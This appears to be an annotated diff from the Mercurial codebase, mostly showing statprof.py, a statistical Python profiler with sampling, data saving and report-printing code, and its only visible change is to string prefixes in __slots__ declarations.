569 def branchinfo(self, rev):
569 def branchinfo(self, rev):
570 """return the branch name and open/close state of a revision
570 """return the branch name and open/close state of a revision
571
571
572 This function exists because creating a changectx object
572 This function exists because creating a changectx object
573 just to access this is costly."""
573 just to access this is costly."""
574 extra = self.read(rev)[5]
574 extra = self.read(rev)[5]
575 return encoding.tolocal(extra.get("branch")), 'close' in extra
575 return encoding.tolocal(extra.get("branch")), 'close' in extra
576
576
577 def _nodeduplicatecallback(self, transaction, node):
577 def _nodeduplicatecallback(self, transaction, node):
578 # keep track of revisions that got "re-added", eg: unbunde of know rev.
578 # keep track of revisions that got "re-added", eg: unbunde of know rev.
579 #
579 #
580 # We track them in a list to preserve their order from the source bundle
580 # We track them in a list to preserve their order from the source bundle
581 duplicates = transaction.changes.setdefault('revduplicates', [])
581 duplicates = transaction.changes.setdefault('revduplicates', [])
582 duplicates.append(self.rev(node))
582 duplicates.append(self.rev(node))
@@ -1,969 +1,969 b''
1 #!/usr/bin/env python
1 #!/usr/bin/env python
2 ## statprof.py
2 ## statprof.py
3 ## Copyright (C) 2012 Bryan O'Sullivan <bos@serpentine.com>
3 ## Copyright (C) 2012 Bryan O'Sullivan <bos@serpentine.com>
4 ## Copyright (C) 2011 Alex Fraser <alex at phatcore dot com>
4 ## Copyright (C) 2011 Alex Fraser <alex at phatcore dot com>
5 ## Copyright (C) 2004,2005 Andy Wingo <wingo at pobox dot com>
5 ## Copyright (C) 2004,2005 Andy Wingo <wingo at pobox dot com>
6 ## Copyright (C) 2001 Rob Browning <rlb at defaultvalue dot org>
6 ## Copyright (C) 2001 Rob Browning <rlb at defaultvalue dot org>
7
7
8 ## This library is free software; you can redistribute it and/or
8 ## This library is free software; you can redistribute it and/or
9 ## modify it under the terms of the GNU Lesser General Public
9 ## modify it under the terms of the GNU Lesser General Public
10 ## License as published by the Free Software Foundation; either
10 ## License as published by the Free Software Foundation; either
11 ## version 2.1 of the License, or (at your option) any later version.
11 ## version 2.1 of the License, or (at your option) any later version.
12 ##
12 ##
13 ## This library is distributed in the hope that it will be useful,
13 ## This library is distributed in the hope that it will be useful,
14 ## but WITHOUT ANY WARRANTY; without even the implied warranty of
14 ## but WITHOUT ANY WARRANTY; without even the implied warranty of
15 ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
15 ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
16 ## Lesser General Public License for more details.
16 ## Lesser General Public License for more details.
17 ##
17 ##
18 ## You should have received a copy of the GNU Lesser General Public
18 ## You should have received a copy of the GNU Lesser General Public
19 ## License along with this program; if not, contact:
19 ## License along with this program; if not, contact:
20 ##
20 ##
21 ## Free Software Foundation Voice: +1-617-542-5942
21 ## Free Software Foundation Voice: +1-617-542-5942
22 ## 59 Temple Place - Suite 330 Fax: +1-617-542-2652
22 ## 59 Temple Place - Suite 330 Fax: +1-617-542-2652
23 ## Boston, MA 02111-1307, USA gnu@gnu.org
23 ## Boston, MA 02111-1307, USA gnu@gnu.org
24
24
25 """
25 """
26 statprof is intended to be a fairly simple statistical profiler for
26 statprof is intended to be a fairly simple statistical profiler for
27 python. It was ported directly from a statistical profiler for guile,
27 python. It was ported directly from a statistical profiler for guile,
28 also named statprof, available from guile-lib [0].
28 also named statprof, available from guile-lib [0].
29
29
30 [0] http://wingolog.org/software/guile-lib/statprof/
30 [0] http://wingolog.org/software/guile-lib/statprof/
31
31
32 To start profiling, call statprof.start():
32 To start profiling, call statprof.start():
33 >>> start()
33 >>> start()
34
34
35 Then run whatever it is that you want to profile, for example:
35 Then run whatever it is that you want to profile, for example:
36 >>> import test.pystone; test.pystone.pystones()
36 >>> import test.pystone; test.pystone.pystones()
37
37
38 Then stop the profiling and print out the results:
38 Then stop the profiling and print out the results:
39 >>> stop()
39 >>> stop()
40 >>> display()
40 >>> display()
41 % cumulative self
41 % cumulative self
42 time seconds seconds name
42 time seconds seconds name
43 26.72 1.40 0.37 pystone.py:79:Proc0
43 26.72 1.40 0.37 pystone.py:79:Proc0
44 13.79 0.56 0.19 pystone.py:133:Proc1
44 13.79 0.56 0.19 pystone.py:133:Proc1
45 13.79 0.19 0.19 pystone.py:208:Proc8
45 13.79 0.19 0.19 pystone.py:208:Proc8
46 10.34 0.16 0.14 pystone.py:229:Func2
46 10.34 0.16 0.14 pystone.py:229:Func2
47 6.90 0.10 0.10 pystone.py:45:__init__
47 6.90 0.10 0.10 pystone.py:45:__init__
48 4.31 0.16 0.06 pystone.py:53:copy
48 4.31 0.16 0.06 pystone.py:53:copy
49 ...
49 ...
50
50
51 All of the numerical data is statistically approximate. In the
51 All of the numerical data is statistically approximate. In the
52 following column descriptions, and in all of statprof, "time" refers
52 following column descriptions, and in all of statprof, "time" refers
53 to execution time (both user and system), not wall clock time.
53 to execution time (both user and system), not wall clock time.
54
54
55 % time
55 % time
56 The percent of the time spent inside the procedure itself (not
56 The percent of the time spent inside the procedure itself (not
57 counting children).
57 counting children).
58
58
59 cumulative seconds
59 cumulative seconds
60 The total number of seconds spent in the procedure, including
60 The total number of seconds spent in the procedure, including
61 children.
61 children.
62
62
63 self seconds
63 self seconds
64 The total number of seconds spent in the procedure itself (not
64 The total number of seconds spent in the procedure itself (not
65 counting children).
65 counting children).
66
66
67 name
67 name
68 The name of the procedure.
68 The name of the procedure.
69
69
70 By default statprof keeps the data collected from previous runs. If you
70 By default statprof keeps the data collected from previous runs. If you
71 want to clear the collected data, call reset():
71 want to clear the collected data, call reset():
72 >>> reset()
72 >>> reset()
73
73
74 reset() can also be used to change the sampling frequency from the
74 reset() can also be used to change the sampling frequency from the
75 default of 1000 Hz. For example, to tell statprof to sample 50 times a
75 default of 1000 Hz. For example, to tell statprof to sample 50 times a
76 second:
76 second:
77 >>> reset(50)
77 >>> reset(50)
78
78
79 This means that statprof will sample the call stack after every 1/50 of
79 This means that statprof will sample the call stack after every 1/50 of
80 a second of user + system time spent running on behalf of the python
80 a second of user + system time spent running on behalf of the python
81 process. When your process is idle (for example, blocking in a read(),
81 process. When your process is idle (for example, blocking in a read(),
82 as is the case at the listener), the clock does not advance. For this
82 as is the case at the listener), the clock does not advance. For this
83 reason statprof is not currently not suitable for profiling io-bound
83 reason statprof is not currently not suitable for profiling io-bound
84 operations.
84 operations.
85
85
86 The profiler uses the hash of the code object itself to identify the
86 The profiler uses the hash of the code object itself to identify the
87 procedures, so it won't confuse different procedures with the same name.
87 procedures, so it won't confuse different procedures with the same name.
88 They will show up as two different rows in the output.
88 They will show up as two different rows in the output.
89
89
90 Right now the profiler is quite simplistic. I cannot provide
90 Right now the profiler is quite simplistic. I cannot provide
91 call-graphs or other higher level information. What you see in the
91 call-graphs or other higher level information. What you see in the
92 table is pretty much all there is. Patches are welcome :-)
92 table is pretty much all there is. Patches are welcome :-)
93
93
94
94
95 Threading
95 Threading
96 ---------
96 ---------
97
97
98 Because signals only get delivered to the main thread in Python,
98 Because signals only get delivered to the main thread in Python,
99 statprof only profiles the main thread. However because the time
99 statprof only profiles the main thread. However because the time
100 reporting function uses per-process timers, the results can be
100 reporting function uses per-process timers, the results can be
101 significantly off if other threads' work patterns are not similar to the
101 significantly off if other threads' work patterns are not similar to the
102 main thread's work patterns.
102 main thread's work patterns.
103 """
103 """
104 # no-check-code
104 # no-check-code
105 from __future__ import absolute_import, division, print_function
105 from __future__ import absolute_import, division, print_function
106
106
107 import collections
107 import collections
108 import contextlib
108 import contextlib
109 import getopt
109 import getopt
110 import inspect
110 import inspect
111 import json
111 import json
112 import os
112 import os
113 import signal
113 import signal
114 import sys
114 import sys
115 import threading
115 import threading
116 import time
116 import time
117
117
118 from . import (
118 from . import (
119 encoding,
119 encoding,
120 pycompat,
120 pycompat,
121 )
121 )
122
122
123 defaultdict = collections.defaultdict
123 defaultdict = collections.defaultdict
124 contextmanager = contextlib.contextmanager
124 contextmanager = contextlib.contextmanager
125
125
126 __all__ = ['start', 'stop', 'reset', 'display', 'profile']
126 __all__ = ['start', 'stop', 'reset', 'display', 'profile']
127
127
128 skips = {
128 skips = {
129 r"util.py:check",
129 r"util.py:check",
130 r"extensions.py:closure",
130 r"extensions.py:closure",
131 r"color.py:colorcmd",
131 r"color.py:colorcmd",
132 r"dispatch.py:checkargs",
132 r"dispatch.py:checkargs",
133 r"dispatch.py:<lambda>",
133 r"dispatch.py:<lambda>",
134 r"dispatch.py:_runcatch",
134 r"dispatch.py:_runcatch",
135 r"dispatch.py:_dispatch",
135 r"dispatch.py:_dispatch",
136 r"dispatch.py:_runcommand",
136 r"dispatch.py:_runcommand",
137 r"pager.py:pagecmd",
137 r"pager.py:pagecmd",
138 r"dispatch.py:run",
138 r"dispatch.py:run",
139 r"dispatch.py:dispatch",
139 r"dispatch.py:dispatch",
140 r"dispatch.py:runcommand",
140 r"dispatch.py:runcommand",
141 r"hg.py:<module>",
141 r"hg.py:<module>",
142 r"evolve.py:warnobserrors",
142 r"evolve.py:warnobserrors",
143 }
143 }
144
144
145 ###########################################################################
145 ###########################################################################
146 ## Utils
146 ## Utils
147
147
148 def clock():
148 def clock():
149 times = os.times()
149 times = os.times()
150 return (times[0] + times[1], times[4])
150 return (times[0] + times[1], times[4])
151
151
152
152
153 ###########################################################################
153 ###########################################################################
154 ## Collection data structures
154 ## Collection data structures
155
155
156 class ProfileState(object):
156 class ProfileState(object):
157 def __init__(self, frequency=None):
157 def __init__(self, frequency=None):
158 self.reset(frequency)
158 self.reset(frequency)
159 self.track = 'cpu'
159 self.track = 'cpu'
160
160
161 def reset(self, frequency=None):
161 def reset(self, frequency=None):
162 # total so far
162 # total so far
163 self.accumulated_time = (0.0, 0.0)
163 self.accumulated_time = (0.0, 0.0)
164 # start_time when timer is active
164 # start_time when timer is active
165 self.last_start_time = None
165 self.last_start_time = None
166 # a float
166 # a float
167 if frequency:
167 if frequency:
168 self.sample_interval = 1.0 / frequency
168 self.sample_interval = 1.0 / frequency
169 elif not hasattr(self, 'sample_interval'):
169 elif not hasattr(self, 'sample_interval'):
170 # default to 1000 Hz
170 # default to 1000 Hz
171 self.sample_interval = 1.0 / 1000.0
171 self.sample_interval = 1.0 / 1000.0
172 else:
172 else:
173 # leave the frequency as it was
173 # leave the frequency as it was
174 pass
174 pass
175 self.remaining_prof_time = None
175 self.remaining_prof_time = None
176 # for user start/stop nesting
176 # for user start/stop nesting
177 self.profile_level = 0
177 self.profile_level = 0
178
178
179 self.samples = []
179 self.samples = []
180
180
181 def accumulate_time(self, stop_time):
181 def accumulate_time(self, stop_time):
182 increment = (
182 increment = (
183 stop_time[0] - self.last_start_time[0],
183 stop_time[0] - self.last_start_time[0],
184 stop_time[1] - self.last_start_time[1],
184 stop_time[1] - self.last_start_time[1],
185 )
185 )
186 self.accumulated_time = (
186 self.accumulated_time = (
187 self.accumulated_time[0] + increment[0],
187 self.accumulated_time[0] + increment[0],
188 self.accumulated_time[1] + increment[1],
188 self.accumulated_time[1] + increment[1],
189 )
189 )
190
190
191 def seconds_per_sample(self):
191 def seconds_per_sample(self):
192 return self.accumulated_time[self.timeidx] / len(self.samples)
192 return self.accumulated_time[self.timeidx] / len(self.samples)
193
193
194 @property
194 @property
195 def timeidx(self):
195 def timeidx(self):
196 if self.track == 'real':
196 if self.track == 'real':
197 return 1
197 return 1
198 return 0
198 return 0
199
199
200 state = ProfileState()
200 state = ProfileState()
201
201
202
202
203 class CodeSite(object):
203 class CodeSite(object):
204 cache = {}
204 cache = {}
205
205
206 __slots__ = (u'path', u'lineno', u'function', u'source')
206 __slots__ = (r'path', r'lineno', r'function', r'source')
207
207
208 def __init__(self, path, lineno, function):
208 def __init__(self, path, lineno, function):
209 assert isinstance(path, bytes)
209 assert isinstance(path, bytes)
210 self.path = path
210 self.path = path
211 self.lineno = lineno
211 self.lineno = lineno
212 assert isinstance(function, bytes)
212 assert isinstance(function, bytes)
213 self.function = function
213 self.function = function
214 self.source = None
214 self.source = None
215
215
216 def __eq__(self, other):
216 def __eq__(self, other):
217 try:
217 try:
218 return (self.lineno == other.lineno and
218 return (self.lineno == other.lineno and
219 self.path == other.path)
219 self.path == other.path)
220 except:
220 except:
221 return False
221 return False
222
222
223 def __hash__(self):
223 def __hash__(self):
224 return hash((self.lineno, self.path))
224 return hash((self.lineno, self.path))
225
225
226 @classmethod
226 @classmethod
227 def get(cls, path, lineno, function):
227 def get(cls, path, lineno, function):
228 k = (path, lineno)
228 k = (path, lineno)
229 try:
229 try:
230 return cls.cache[k]
230 return cls.cache[k]
231 except KeyError:
231 except KeyError:
232 v = cls(path, lineno, function)
232 v = cls(path, lineno, function)
233 cls.cache[k] = v
233 cls.cache[k] = v
234 return v
234 return v
235
235
236 def getsource(self, length):
236 def getsource(self, length):
237 if self.source is None:
237 if self.source is None:
238 lineno = self.lineno - 1
238 lineno = self.lineno - 1
239 fp = None
239 fp = None
240 try:
240 try:
241 fp = open(self.path, 'rb')
241 fp = open(self.path, 'rb')
242 for i, line in enumerate(fp):
242 for i, line in enumerate(fp):
243 if i == lineno:
243 if i == lineno:
244 self.source = line.strip()
244 self.source = line.strip()
245 break
245 break
246 except:
246 except:
247 pass
247 pass
248 finally:
248 finally:
249 if fp:
249 if fp:
250 fp.close()
250 fp.close()
251 if self.source is None:
251 if self.source is None:
252 self.source = ''
252 self.source = ''
253
253
254 source = self.source
254 source = self.source
255 if len(source) > length:
255 if len(source) > length:
256 source = source[:(length - 3)] + "..."
256 source = source[:(length - 3)] + "..."
257 return source
257 return source
258
258
259 def filename(self):
259 def filename(self):
260 return os.path.basename(self.path)
260 return os.path.basename(self.path)
261
261
262 def skipname(self):
262 def skipname(self):
263 return r'%s:%s' % (self.filename(), self.function)
263 return r'%s:%s' % (self.filename(), self.function)
264
264
265 class Sample(object):
265 class Sample(object):
266 __slots__ = (u'stack', u'time')
266 __slots__ = (r'stack', r'time')
267
267
268 def __init__(self, stack, time):
268 def __init__(self, stack, time):
269 self.stack = stack
269 self.stack = stack
270 self.time = time
270 self.time = time
271
271
272 @classmethod
272 @classmethod
273 def from_frame(cls, frame, time):
273 def from_frame(cls, frame, time):
274 stack = []
274 stack = []
275
275
276 while frame:
276 while frame:
277 stack.append(CodeSite.get(
277 stack.append(CodeSite.get(
278 pycompat.sysbytes(frame.f_code.co_filename),
278 pycompat.sysbytes(frame.f_code.co_filename),
279 frame.f_lineno,
279 frame.f_lineno,
280 pycompat.sysbytes(frame.f_code.co_name)))
280 pycompat.sysbytes(frame.f_code.co_name)))
281 frame = frame.f_back
281 frame = frame.f_back
282
282
283 return Sample(stack, time)
283 return Sample(stack, time)
284
284
285 ###########################################################################
285 ###########################################################################
286 ## SIGPROF handler
286 ## SIGPROF handler
287
287
288 def profile_signal_handler(signum, frame):
288 def profile_signal_handler(signum, frame):
289 if state.profile_level > 0:
289 if state.profile_level > 0:
290 now = clock()
290 now = clock()
291 state.accumulate_time(now)
291 state.accumulate_time(now)
292
292
293 timestamp = state.accumulated_time[state.timeidx]
293 timestamp = state.accumulated_time[state.timeidx]
294 state.samples.append(Sample.from_frame(frame, timestamp))
294 state.samples.append(Sample.from_frame(frame, timestamp))
295
295
296 signal.setitimer(signal.ITIMER_PROF,
296 signal.setitimer(signal.ITIMER_PROF,
297 state.sample_interval, 0.0)
297 state.sample_interval, 0.0)
298 state.last_start_time = now
298 state.last_start_time = now
299
299
300 stopthread = threading.Event()
300 stopthread = threading.Event()
301 def samplerthread(tid):
301 def samplerthread(tid):
302 while not stopthread.is_set():
302 while not stopthread.is_set():
303 now = clock()
303 now = clock()
304 state.accumulate_time(now)
304 state.accumulate_time(now)
305
305
306 frame = sys._current_frames()[tid]
306 frame = sys._current_frames()[tid]
307
307
308 timestamp = state.accumulated_time[state.timeidx]
308 timestamp = state.accumulated_time[state.timeidx]
309 state.samples.append(Sample.from_frame(frame, timestamp))
309 state.samples.append(Sample.from_frame(frame, timestamp))
310
310
311 state.last_start_time = now
311 state.last_start_time = now
312 time.sleep(state.sample_interval)
312 time.sleep(state.sample_interval)
313
313
314 stopthread.clear()
314 stopthread.clear()
315
315
316 ###########################################################################
316 ###########################################################################
317 ## Profiling API
317 ## Profiling API
318
318
319 def is_active():
319 def is_active():
320 return state.profile_level > 0
320 return state.profile_level > 0
321
321
322 lastmechanism = None
322 lastmechanism = None
323 def start(mechanism='thread', track='cpu'):
323 def start(mechanism='thread', track='cpu'):
324 '''Install the profiling signal handler, and start profiling.'''
324 '''Install the profiling signal handler, and start profiling.'''
325 state.track = track # note: nesting different mode won't work
325 state.track = track # note: nesting different mode won't work
326 state.profile_level += 1
326 state.profile_level += 1
327 if state.profile_level == 1:
327 if state.profile_level == 1:
328 state.last_start_time = clock()
328 state.last_start_time = clock()
329 rpt = state.remaining_prof_time
329 rpt = state.remaining_prof_time
330 state.remaining_prof_time = None
330 state.remaining_prof_time = None
331
331
332 global lastmechanism
332 global lastmechanism
333 lastmechanism = mechanism
333 lastmechanism = mechanism
334
334
335 if mechanism == 'signal':
335 if mechanism == 'signal':
336 signal.signal(signal.SIGPROF, profile_signal_handler)
336 signal.signal(signal.SIGPROF, profile_signal_handler)
337 signal.setitimer(signal.ITIMER_PROF,
337 signal.setitimer(signal.ITIMER_PROF,
338 rpt or state.sample_interval, 0.0)
338 rpt or state.sample_interval, 0.0)
339 elif mechanism == 'thread':
339 elif mechanism == 'thread':
340 frame = inspect.currentframe()
340 frame = inspect.currentframe()
341 tid = [k for k, f in sys._current_frames().items() if f == frame][0]
341 tid = [k for k, f in sys._current_frames().items() if f == frame][0]
342 state.thread = threading.Thread(target=samplerthread,
342 state.thread = threading.Thread(target=samplerthread,
343 args=(tid,), name="samplerthread")
343 args=(tid,), name="samplerthread")
344 state.thread.start()
344 state.thread.start()
345
345
346 def stop():
346 def stop():
347 '''Stop profiling, and uninstall the profiling signal handler.'''
347 '''Stop profiling, and uninstall the profiling signal handler.'''
348 state.profile_level -= 1
348 state.profile_level -= 1
349 if state.profile_level == 0:
349 if state.profile_level == 0:
350 if lastmechanism == 'signal':
350 if lastmechanism == 'signal':
351 rpt = signal.setitimer(signal.ITIMER_PROF, 0.0, 0.0)
351 rpt = signal.setitimer(signal.ITIMER_PROF, 0.0, 0.0)
352 signal.signal(signal.SIGPROF, signal.SIG_IGN)
352 signal.signal(signal.SIGPROF, signal.SIG_IGN)
353 state.remaining_prof_time = rpt[0]
353 state.remaining_prof_time = rpt[0]
354 elif lastmechanism == 'thread':
354 elif lastmechanism == 'thread':
355 stopthread.set()
355 stopthread.set()
356 state.thread.join()
356 state.thread.join()
357
357
358 state.accumulate_time(clock())
358 state.accumulate_time(clock())
359 state.last_start_time = None
359 state.last_start_time = None
360 statprofpath = encoding.environ.get('STATPROF_DEST')
360 statprofpath = encoding.environ.get('STATPROF_DEST')
361 if statprofpath:
361 if statprofpath:
362 save_data(statprofpath)
362 save_data(statprofpath)
363
363
364 return state
364 return state
365
365
366 def save_data(path):
366 def save_data(path):
367 with open(path, 'w+') as file:
367 with open(path, 'w+') as file:
368 file.write("%f %f\n" % state.accumulated_time)
368 file.write("%f %f\n" % state.accumulated_time)
369 for sample in state.samples:
369 for sample in state.samples:
370 time = sample.time
370 time = sample.time
371 stack = sample.stack
371 stack = sample.stack
372 sites = ['\1'.join([s.path, b'%d' % s.lineno, s.function])
372 sites = ['\1'.join([s.path, b'%d' % s.lineno, s.function])
373 for s in stack]
373 for s in stack]
374 file.write("%d\0%s\n" % (time, '\0'.join(sites)))
374 file.write("%d\0%s\n" % (time, '\0'.join(sites)))
375
375
376 def load_data(path):
376 def load_data(path):
377 lines = open(path, 'rb').read().splitlines()
377 lines = open(path, 'rb').read().splitlines()
378
378
379 state.accumulated_time = [float(value) for value in lines[0].split()]
379 state.accumulated_time = [float(value) for value in lines[0].split()]
380 state.samples = []
380 state.samples = []
381 for line in lines[1:]:
381 for line in lines[1:]:
382 parts = line.split('\0')
382 parts = line.split('\0')
383 time = float(parts[0])
383 time = float(parts[0])
384 rawsites = parts[1:]
384 rawsites = parts[1:]
385 sites = []
385 sites = []
386 for rawsite in rawsites:
386 for rawsite in rawsites:
387 siteparts = rawsite.split('\1')
387 siteparts = rawsite.split('\1')
388 sites.append(CodeSite.get(siteparts[0], int(siteparts[1]),
388 sites.append(CodeSite.get(siteparts[0], int(siteparts[1]),
389 siteparts[2]))
389 siteparts[2]))
390
390
391 state.samples.append(Sample(sites, time))
391 state.samples.append(Sample(sites, time))
392
392
393
393
394
394
395 def reset(frequency=None):
395 def reset(frequency=None):
396 '''Clear out the state of the profiler. Do not call while the
396 '''Clear out the state of the profiler. Do not call while the
397 profiler is running.
397 profiler is running.
398
398
399 The optional frequency argument specifies the number of samples to
399 The optional frequency argument specifies the number of samples to
400 collect per second.'''
400 collect per second.'''
401 assert state.profile_level == 0, "Can't reset() while statprof is running"
401 assert state.profile_level == 0, "Can't reset() while statprof is running"
402 CodeSite.cache.clear()
402 CodeSite.cache.clear()
403 state.reset(frequency)
403 state.reset(frequency)
404
404
405
405
406 @contextmanager
406 @contextmanager
407 def profile():
407 def profile():
408 start()
408 start()
409 try:
409 try:
410 yield
410 yield
411 finally:
411 finally:
412 stop()
412 stop()
413 display()
413 display()
414
414
415
415
416 ###########################################################################
416 ###########################################################################
417 ## Reporting API
417 ## Reporting API
418
418
419 class SiteStats(object):
419 class SiteStats(object):
420 def __init__(self, site):
420 def __init__(self, site):
421 self.site = site
421 self.site = site
422 self.selfcount = 0
422 self.selfcount = 0
423 self.totalcount = 0
423 self.totalcount = 0
424
424
425 def addself(self):
425 def addself(self):
426 self.selfcount += 1
426 self.selfcount += 1
427
427
428 def addtotal(self):
428 def addtotal(self):
429 self.totalcount += 1
429 self.totalcount += 1
430
430
431 def selfpercent(self):
431 def selfpercent(self):
432 return self.selfcount / len(state.samples) * 100
432 return self.selfcount / len(state.samples) * 100
433
433
434 def totalpercent(self):
434 def totalpercent(self):
435 return self.totalcount / len(state.samples) * 100
435 return self.totalcount / len(state.samples) * 100
436
436
437 def selfseconds(self):
437 def selfseconds(self):
438 return self.selfcount * state.seconds_per_sample()
438 return self.selfcount * state.seconds_per_sample()
439
439
440 def totalseconds(self):
440 def totalseconds(self):
441 return self.totalcount * state.seconds_per_sample()
441 return self.totalcount * state.seconds_per_sample()
442
442
443 @classmethod
443 @classmethod
444 def buildstats(cls, samples):
444 def buildstats(cls, samples):
445 stats = {}
445 stats = {}
446
446
447 for sample in samples:
447 for sample in samples:
448 for i, site in enumerate(sample.stack):
448 for i, site in enumerate(sample.stack):
449 sitestat = stats.get(site)
449 sitestat = stats.get(site)
450 if not sitestat:
450 if not sitestat:
451 sitestat = SiteStats(site)
451 sitestat = SiteStats(site)
452 stats[site] = sitestat
452 stats[site] = sitestat
453
453
454 sitestat.addtotal()
454 sitestat.addtotal()
455
455
456 if i == 0:
456 if i == 0:
457 sitestat.addself()
457 sitestat.addself()
458
458
459 return [s for s in stats.itervalues()]
459 return [s for s in stats.itervalues()]
460
460
461 class DisplayFormats:
461 class DisplayFormats:
462 ByLine = 0
462 ByLine = 0
463 ByMethod = 1
463 ByMethod = 1
464 AboutMethod = 2
464 AboutMethod = 2
465 Hotpath = 3
465 Hotpath = 3
466 FlameGraph = 4
466 FlameGraph = 4
467 Json = 5
467 Json = 5
468 Chrome = 6
468 Chrome = 6
469
469
470 def display(fp=None, format=3, data=None, **kwargs):
470 def display(fp=None, format=3, data=None, **kwargs):
471 '''Print statistics, either to stdout or the given file object.'''
471 '''Print statistics, either to stdout or the given file object.'''
472 if data is None:
472 if data is None:
473 data = state
473 data = state
474
474
475 if fp is None:
475 if fp is None:
476 import sys
476 import sys
477 fp = sys.stdout
477 fp = sys.stdout
478 if len(data.samples) == 0:
478 if len(data.samples) == 0:
479 fp.write(b'No samples recorded.\n')
479 fp.write(b'No samples recorded.\n')
480 return
480 return
481
481
482 if format == DisplayFormats.ByLine:
482 if format == DisplayFormats.ByLine:
483 display_by_line(data, fp)
483 display_by_line(data, fp)
484 elif format == DisplayFormats.ByMethod:
484 elif format == DisplayFormats.ByMethod:
485 display_by_method(data, fp)
485 display_by_method(data, fp)
486 elif format == DisplayFormats.AboutMethod:
486 elif format == DisplayFormats.AboutMethod:
487 display_about_method(data, fp, **kwargs)
487 display_about_method(data, fp, **kwargs)
488 elif format == DisplayFormats.Hotpath:
488 elif format == DisplayFormats.Hotpath:
489 display_hotpath(data, fp, **kwargs)
489 display_hotpath(data, fp, **kwargs)
490 elif format == DisplayFormats.FlameGraph:
490 elif format == DisplayFormats.FlameGraph:
491 write_to_flame(data, fp, **kwargs)
491 write_to_flame(data, fp, **kwargs)
492 elif format == DisplayFormats.Json:
492 elif format == DisplayFormats.Json:
493 write_to_json(data, fp)
493 write_to_json(data, fp)
494 elif format == DisplayFormats.Chrome:
494 elif format == DisplayFormats.Chrome:
495 write_to_chrome(data, fp, **kwargs)
495 write_to_chrome(data, fp, **kwargs)
496 else:
496 else:
497 raise Exception("Invalid display format")
497 raise Exception("Invalid display format")
498
498
499 if format not in (DisplayFormats.Json, DisplayFormats.Chrome):
499 if format not in (DisplayFormats.Json, DisplayFormats.Chrome):
500 fp.write(b'---\n')
500 fp.write(b'---\n')
501 fp.write(b'Sample count: %d\n' % len(data.samples))
501 fp.write(b'Sample count: %d\n' % len(data.samples))
502 fp.write(b'Total time: %f seconds (%f wall)\n' % data.accumulated_time)
502 fp.write(b'Total time: %f seconds (%f wall)\n' % data.accumulated_time)
503
503
504 def display_by_line(data, fp):
504 def display_by_line(data, fp):
505 '''Print the profiler data with each sample line represented
505 '''Print the profiler data with each sample line represented
506 as one row in a table. Sorted by self-time per line.'''
506 as one row in a table. Sorted by self-time per line.'''
507 stats = SiteStats.buildstats(data.samples)
507 stats = SiteStats.buildstats(data.samples)
508 stats.sort(reverse=True, key=lambda x: x.selfseconds())
508 stats.sort(reverse=True, key=lambda x: x.selfseconds())
509
509
510 fp.write(b'%5.5s %10.10s %7.7s %-8.8s\n' % (
510 fp.write(b'%5.5s %10.10s %7.7s %-8.8s\n' % (
511 b'% ', b'cumulative', b'self', b''))
511 b'% ', b'cumulative', b'self', b''))
512 fp.write(b'%5.5s %9.9s %8.8s %-8.8s\n' % (
512 fp.write(b'%5.5s %9.9s %8.8s %-8.8s\n' % (
513 b"time", b"seconds", b"seconds", b"name"))
513 b"time", b"seconds", b"seconds", b"name"))
514
514
515 for stat in stats:
515 for stat in stats:
516 site = stat.site
516 site = stat.site
517 sitelabel = '%s:%d:%s' % (site.filename(),
517 sitelabel = '%s:%d:%s' % (site.filename(),
518 site.lineno,
518 site.lineno,
519 site.function)
519 site.function)
520 fp.write(b'%6.2f %9.2f %9.2f %s\n' % (
520 fp.write(b'%6.2f %9.2f %9.2f %s\n' % (
521 stat.selfpercent(), stat.totalseconds(),
521 stat.selfpercent(), stat.totalseconds(),
522 stat.selfseconds(), sitelabel))
522 stat.selfseconds(), sitelabel))
523
523
524 def display_by_method(data, fp):
524 def display_by_method(data, fp):
525 '''Print the profiler data with each sample function represented
525 '''Print the profiler data with each sample function represented
526 as one row in a table. Important lines within that function are
526 as one row in a table. Important lines within that function are
527 output as nested rows. Sorted by self-time per line.'''
527 output as nested rows. Sorted by self-time per line.'''
528 fp.write(b'%5.5s %10.10s %7.7s %-8.8s\n' %
528 fp.write(b'%5.5s %10.10s %7.7s %-8.8s\n' %
529 ('% ', 'cumulative', 'self', ''))
529 ('% ', 'cumulative', 'self', ''))
530 fp.write(b'%5.5s %9.9s %8.8s %-8.8s\n' %
530 fp.write(b'%5.5s %9.9s %8.8s %-8.8s\n' %
531 ("time", "seconds", "seconds", "name"))
531 ("time", "seconds", "seconds", "name"))
532
532
533 stats = SiteStats.buildstats(data.samples)
533 stats = SiteStats.buildstats(data.samples)
534
534
535 grouped = defaultdict(list)
535 grouped = defaultdict(list)
536 for stat in stats:
536 for stat in stats:
537 grouped[stat.site.filename() + b":" + stat.site.function].append(stat)
537 grouped[stat.site.filename() + b":" + stat.site.function].append(stat)
538
538
539 # compute sums for each function
539 # compute sums for each function
540 functiondata = []
540 functiondata = []
541 for fname, sitestats in grouped.iteritems():
541 for fname, sitestats in grouped.iteritems():
542 total_cum_sec = 0
542 total_cum_sec = 0
543 total_self_sec = 0
543 total_self_sec = 0
544 total_percent = 0
544 total_percent = 0
545 for stat in sitestats:
545 for stat in sitestats:
546 total_cum_sec += stat.totalseconds()
546 total_cum_sec += stat.totalseconds()
547 total_self_sec += stat.selfseconds()
547 total_self_sec += stat.selfseconds()
548 total_percent += stat.selfpercent()
548 total_percent += stat.selfpercent()
549
549
550 functiondata.append((fname,
550 functiondata.append((fname,
551 total_cum_sec,
551 total_cum_sec,
552 total_self_sec,
552 total_self_sec,
553 total_percent,
553 total_percent,
554 sitestats))
554 sitestats))
555
555
556 # sort by total self sec
556 # sort by total self sec
557 functiondata.sort(reverse=True, key=lambda x: x[2])
557 functiondata.sort(reverse=True, key=lambda x: x[2])
558
558
559 for function in functiondata:
559 for function in functiondata:
560 if function[3] < 0.05:
560 if function[3] < 0.05:
561 continue
561 continue
562 fp.write(b'%6.2f %9.2f %9.2f %s\n' % (
562 fp.write(b'%6.2f %9.2f %9.2f %s\n' % (
563 function[3], # total percent
563 function[3], # total percent
564 function[1], # total cum sec
564 function[1], # total cum sec
565 function[2], # total self sec
565 function[2], # total self sec
566 function[0])) # file:function
566 function[0])) # file:function
567
567
568 function[4].sort(reverse=True, key=lambda i: i.selfseconds())
568 function[4].sort(reverse=True, key=lambda i: i.selfseconds())
569 for stat in function[4]:
569 for stat in function[4]:
570 # only show line numbers for significant locations (>1% time spent)
570 # only show line numbers for significant locations (>1% time spent)
571 if stat.selfpercent() > 1:
571 if stat.selfpercent() > 1:
572 source = stat.site.getsource(25)
